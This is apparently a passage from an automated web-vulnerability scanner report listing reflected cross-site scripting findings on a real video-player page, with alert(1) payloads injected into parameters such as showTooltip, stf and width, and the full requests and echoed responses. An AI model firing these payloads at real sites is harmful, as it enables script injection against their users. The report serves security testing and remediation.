GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=196db0</script><script>alert(1)</script>c1761b81538&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:07 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
ams;
var InternetExplorer        = navigator.appName.indexOf("Microsoft") != -1;
var isError                    = false;
var showBw                    = "1";
var showFeedback            = "1";
var showMenu                = "1";
var showTooltip                = "196db0</script><script>alert(1)</script>c1761b81538";
var loadedItemCount            = 0;
var os                        = "MacOs";
var clientOs                = (ua.indexOf("macintosh") != -1 || ua.indexOf("mac os x") != -1) ? "MacOs" : "Windows";
var rand                    = 1;
var totalItemCount        
...[SNIP]...

2.573. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showTooltip parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the showTooltip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1968b</script><script>alert(1)</script>f691b1326e0 was submitted in the showTooltip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=11968b</script><script>alert(1)</script>f691b1326e0&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:13:12 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=11968b</script><script>alert(1)</script>f691b1326e0&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&
...[SNIP]...

2.574. http://iad.bigpondvideo.com/indexInfinityPlayer.php [showUnmetered parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the showUnmetered request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cde2c</script><script>alert(1)</script>ea88f821204 was submitted in the showUnmetered parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0cde2c</script><script>alert(1)</script>ea88f821204&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:51 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
43&platform=Production&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0cde2c</script><script>alert(1)</script>ea88f821204&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen
...[SNIP]...

2.575. http://iad.bigpondvideo.com/indexInfinityPlayer.php [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the siteId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce208</script><script>alert(1)</script>1aacafdb26f was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1ce208</script><script>alert(1)</script>1aacafdb26f&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:57 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
n=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1ce208</script><script>alert(1)</script>1aacafdb26f&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html&randId=43&os=MacOs&showOverlays=1&debug=
...[SNIP]...

2.576. http://iad.bigpondvideo.com/indexInfinityPlayer.php [stf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the stf request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3cf20</script><script>alert(1)</script>977ccaf3497 was submitted in the stf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=03cf20</script><script>alert(1)</script>977ccaf3497&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:12:23 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=03cf20</script><script>alert(1)</script>977ccaf3497&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&wid
...[SNIP]...

2.577. http://iad.bigpondvideo.com/indexInfinityPlayer.php [stf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the stf request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee41</script><script>alert(1)</script>ffff93cf5af was submitted in the stf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=01ee41</script><script>alert(1)</script>ffff93cf5af&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:12:18 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8727

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<script type="text/javascript">
var ua                        = navigator.userAgent.toLowerCase();
var allowFullScreen            = "1";
var allowStf                = "01ee41</script><script>alert(1)</script>ffff93cf5af";
var assetColor                = "";
var assetLoadedTimeout;
var controlsType            = "internal";
var cStyle                    = "5";
var defaultLeftMargin        = 0;
var domain                    = "http://iad.bigpondvideo.com/";
var initPa
...[SNIP]...

2.578. http://iad.bigpondvideo.com/indexInfinityPlayer.php [titleHeight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the titleHeight request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2e8b</script><script>alert(1)</script>e54e969daab was submitted in the titleHeight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29c2e8b</script><script>alert(1)</script>e54e969daab&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:11:57 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8677

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
duction&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29c2e8b</script><script>alert(1)</script>e54e969daab&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&
...[SNIP]...

2.579. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1823"><script>alert(1)</script>d27ade86fec was submitted in the width parameter. This input was echoed as d1823\"><script>alert(1)</script>d27ade86fec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346d1823"><script>alert(1)</script>d27ade86fec&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:25 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8973

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<div id="silverlightPlayer" style="width:346d1823\"><script>alert(1)</script>d27ade86fecpx; height:297px;">
...[SNIP]...

2.580. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a42d2%3balert(1)//cdc3d0cb702 was submitted in the width parameter. This input was echoed as a42d2;alert(1)//cdc3d0cb702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexInfinityPlayer.php?phpSessionId=380abd2fbc8eacecfbf921d86b600b0a&radio=0&errorFontColor=FFFFFF&errorFontSize=14&cStyle=5&showFeedback=1&showUnmetered=0&titleHeight=29&fontColor=666666&fontSize=14&showTitle=1&stf=0&bFinish=1&holdingImgDefault=1&liveBwOption=3&live=0&showBw=1&showTooltip=1&showMenu=1&allowPreBuffer=0&windowless=1&flv=0&wmv=1&fullScreen=1&autoStart=0&controls=internal&bgColor=000000&height=272&width=346a42d2%3balert(1)//cdc3d0cb702&platformId=1&propertyId=51&siteId=1&environment=iad&allowOverlays=1&isSecure=0&invoke=0&domain=iad.bigpondvideo.com&location=http%3A%2F%2Fiad.bigpondvideo.com%2FApp%2FInfinityPlayer%2FHtml%2FBigpond%2Findex.html&randId=43&os=MacOs HTTP/1.1
Host: iad.bigpondvideo.com
Proxy-Connection: keep-alive
Referer: http://iad.bigpondvideo.com/App/InfinityPlayer/Html/Bigpond/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:14:37 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=380abd2fbc8eacecfbf921d86b600b0a; path=/
Content-Type: text/html
Content-Length: 8820

<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
pt type="text/javascript">
           AC_FL_RunContent(    'id','objFlashPlayer',
                               'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0',
                               'width', 346a42d2;alert(1)//cdc3d0cb702,
                               'height',297,
                               'align','left',
                               'src','App/InfinityPlayer/Flash/presentationPlayer?rand=1',
                               'quality','high',
                               'bgcolor', '#000000',
                               'allowscriptac
...[SNIP]...

2.581. http://iad.bigpondvideo.com/indexInfinityPlayer.php [width parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://iad.bigpondvideo.com
Path:   /indexInfinityPlayer.php

Issue detail

The value of the width request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80943</script><script>alert(1)</script>9695fac6a30 was submitted in the width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

